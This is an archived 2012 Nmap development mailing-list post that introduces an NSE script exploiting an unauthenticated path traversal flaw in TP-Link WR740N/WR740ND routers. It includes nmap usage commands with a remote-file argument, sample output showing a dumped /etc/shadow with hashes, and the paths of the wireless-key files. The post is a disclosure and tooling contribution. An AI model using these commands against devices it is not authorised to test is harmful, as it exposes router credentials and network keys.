Nmap Development mailing list archives
http-tplink-dir-traversal.nse : Exploits path traversal vulnerability affecting several TP-Link wireless router models
From: Paulino Calderon <paulino () calderonpale com>
Date: Thu, 28 Jun 2012 00:48:44 -0500
-------- Original Message --------Subject: http-tplink-dir-traversal.nse : Exploits path traversal vulnerability affecting several TP-Link wireless router models
Date: Thu, 28 Jun 2012 00:25:17 -0500 From: Paulino Calderon <paulino () calderonpale com> To: Nmap Dev <nmap-dev () insecure org> Hi list, description = [[ Exploits a directory traversal vulnerability existing in several TP-Link wireless routers. Attackers may exploit this vulnerability to read any of the configuration and password files. This vulnerability was confirmed in models WR740N and WR740ND but there are several models that use the same HTTP server so I believe they could be vulnerable as well. I appreciate any help confirming the vulnerability in other models. Advisory: * http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740 Other interesting files: * /tmp/topology.cnf (Wireless configuration) * /tmp/ath0.ap_bss (Wireless encryption key) ]] --- -- @usage nmap -p80 --script http-tplink-dir-traversal.nse <target> -- @usage nmap -p80 -Pn -n --script http-tplink-dir-traversal.nse <target> -- @usage nmap -p80 --script http-tplink-dir-traversal.nse --script-args rfile=/etc/topology.conf -d -n -Pn -- -- @output -- PORT STATE SERVICE REASON -- 80/tcp open http syn-ack -- | http-tplink-dir-traversal: -- | VULNERABLE: -- | Path traversal vulnerability in several TP-Link wireless routers -- | State: VULNERABLE (Exploitable) -- | Description: -- | Some TP-Link wireless routers are vulnerable to a path traversal vulnerability that allows attackers to read configurations or any other file in the device. -- | This vulnerability can be exploited without authenticatication. -- | Confirmed vulnerable models: WR740N, WR740ND -- | Possibly vulnerable (Based on the same firmware): WR743ND,WR842ND,WA-901ND,WR941N,WR941ND,WR1043ND,WR2543ND,MR3220,MR3020,WR841N. -- | Disclosure date: 2012-06-18 -- | Extra information: -- | /etc/shadow : -- | -- | root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: -- | Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: -- | bin::10933:0:99999:7::: -- | daemon::10933:0:99999:7::: -- | adm::10933:0:99999:7::: -- | lp:*:10933:0:99999:7::: -- | sync:*:10933:0:99999:7::: -- | shutdown:*:10933:0:99999:7::: -- | halt:*:10933:0:99999:7::: -- | uucp:*:10933:0:99999:7::: -- | operator:*:10933:0:99999:7::: -- | nobody::10933:0:99999:7::: -- | ap71::10933:0:99999:7::: -- | -- | References: -- |_ http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740 -- -- @args http-tplink-dir-traversal.rfile Remote file to download. Default: /etc/passwd -- @args http-tplink-dir-traversal.outfile If set it saves the remote file to this location. -- -- Paulino Calderón Pale Website: http://calderonpale.com Twitter: http://twitter.com/calderpwn
Attachment:
http-tplink-dir-traversal.nse
Description:
_______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
Current thread:
- http-tplink-dir-traversal.nse : Exploits path traversal vulnerability affecting several TP-Link wireless router models Paulino Calderon (Jun 27)